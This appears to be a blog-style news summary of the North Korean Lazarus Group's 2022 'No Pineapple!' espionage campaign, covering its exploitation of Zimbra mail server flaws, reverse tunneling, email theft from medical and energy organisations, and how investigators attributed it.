The Lazarus Group, a North Korean hacker group, recently conducted a cyber espionage campaign targeting organizations in the medical and energy sectors. Known as the ‚No Pineapple!‘ campaign, this operation took place from August to November 2022. Exploiting vulnerabilities in the Zimbra mail server, the group successfully infiltrated the targeted networks. Attribution of this campaign to the Lazarus Group was made by cybersecurity firm WithSecure. Notably, the group utilized new tactics and methods, such as the use of IP addresses lacking domain names in their infrastructure and an updated version of their malware. To maintain persistent access and bypass firewalls, they employed tunneling tools to establish reverse tunnels. During the intrusion, the Lazarus Group managed to extract approximately 5 gigabytes of email messages and around 100GB of data from the victim organization. Nevertheless, their exposure was facilitated by errors, including communication with a North Korean IP address and accidental disclosure of their web shell implant. This article will provide an overview of the Lazarus Group, their tactics and methods, as well as the attribution and impact of their data extraction operation on the medical and energy sectors.
Key Takeaways
- Lazarus Group targeted organizations in the medical research, healthcare, chemical engineering, energy, defense, and leading research university sectors.
- The group exploited vulnerabilities in the Zimbra mail server, specifically CVE-2022-27925 (Remote Code Execution) and CVE-2022-37042 (Authentication Bypass).
- Lazarus Group used tunneling tools Plink and 3Proxy to create reverse tunnels, bypassing firewalls and maintaining persistent access to the network.
- The group extracted around 5 gigabytes of email messages from the server, stored them in a CSV file locally, and uploaded them to their own server.
Lazarus Group Overview
The Lazarus Group, a North Korean hacker group, has been targeting various industries including medical research, healthcare, chemical engineering, energy, defense, and leading research universities through their No Pineapple! cyber espionage campaign. They employ tactics such as exploiting vulnerabilities in the Zimbra mail server and continuously developing new methods. The group is known for extracting email messages and stealing data, with an intrusion that lasted for more than two months and resulted in the theft of around 100GB of data from victim organizations. Attribution challenges arose during the investigation, but the communication with a North Korean IP address (175.45.176[.]27) and the accidental exposure of a web shell implant eventually led to the attribution of the hacking campaign to the Lazarus Group.
Tactics and Methods
Exploiting vulnerabilities in a mail server, the hacker group utilized a range of tactics and methods to achieve unauthorized access to networks. Lazarus Group employed phishing techniques to deceive individuals into divulging sensitive information, such as login credentials, thereby enabling them to infiltrate targeted organizations‘ networks. Once inside, the group exploited weaknesses in the Zimbra mail server, specifically the vulnerabilities CVE-2022-27925 (Remote Code Execution) and CVE-2022-37042 (Authentication Bypass). By leveraging these flaws, Lazarus Group was able to bypass firewalls and establish persistent access to the compromised networks. Additionally, the group employed tunneling tools like Plink and 3Proxy to create reverse tunnels, further evading detection and maintaining their covert presence. These tactics and methods facilitated the extraction of significant amounts of email messages, totaling approximately 5 gigabytes, which were stored in a local CSV file before being uploaded to the threat actors‘ server.
Data Extraction and Attribution
Utilizing their knowledge of vulnerabilities in the Zimbra mail server, the hacker group successfully extracted a significant amount of email messages from the targeted organizations, storing the data locally before uploading it to their own server. The data extraction techniques employed by the Lazarus Group allowed them to gain access to approximately 5 gigabytes of email messages, which were then stored in a CSV file. This extraction process lasted for over two months, during which the threat actors were able to maintain persistent access to the network. However, their error in communication with a North Korean IP address and the accidental revelation of their web shell implant ultimately led to the attribution of the hacking campaign to the Lazarus Group. These attribution challenges highlight the complex nature of identifying and tracking cybercriminals in the digital landscape.
| Data Extraction Techniques | Attribution Challenges |
|---|---|
| Exploitation of Zimbra mail server vulnerabilities | Difficulty in identifying origin of attacks |
| Local storage and upload to threat actors‘ server | Accidental exposure of web shell implant |
| Extraction of approximately 5 gigabytes of email messages | Communication with a North Korean IP address |
| Persistent access to network for over two months | Attribution of hacking campaign to Lazarus Group |
| Misstep in communication leading to attribution | Complexity in tracking cybercriminals |
Frequently Asked Questions
What are some other industries that Lazarus Group has targeted in the past?
In the past, the Lazarus Group has targeted industries such as the financial and government sectors. These sectors have been subject to cyber attacks by the group, indicating a broader range of targets beyond the medical and energy sectors.
How did Lazarus Group exploit the vulnerabilities in the Zimbra mail server?
The Lazarus Group exploited vulnerabilities in the Zimbra mail server to gain unauthorized access to targeted organizations. They took advantage of weaknesses such as CVE-2022-27925 (Remote Code Execution) and CVE-2022-37042 (Authentication Bypass) to penetrate the network.
What are some new developments in the tactics and methods of Lazarus Group?
The Lazarus Group has shown evolutionary tactics and advanced methods in their recent campaigns. They have utilized IP addresses without domain names in their infrastructure and updated their Dtrack info-stealer and GREASE malware. These developments demonstrate their adaptability and sophistication.
How did Lazarus Group maintain persistent access to the network?
The Lazarus Group maintained persistent access to the network by exploiting vulnerabilities in the Zimbra mail server, specifically CVE-2022-27925 (Remote Code Execution) and CVE-2022-37042 (Authentication Bypass). They used tunneling tools to create reverse tunnels, bypassing the firewall.
How did the investigation reveal the North Korean attribution of the hacking campaign?
The investigation findings revealed the North Korean attribution of the hacking campaign. The investigation identified communication with a North Korean IP address, suggesting the involvement of a threat actor from North Korea. This discovery led to the attribution of the hacking campaign to North Korea.
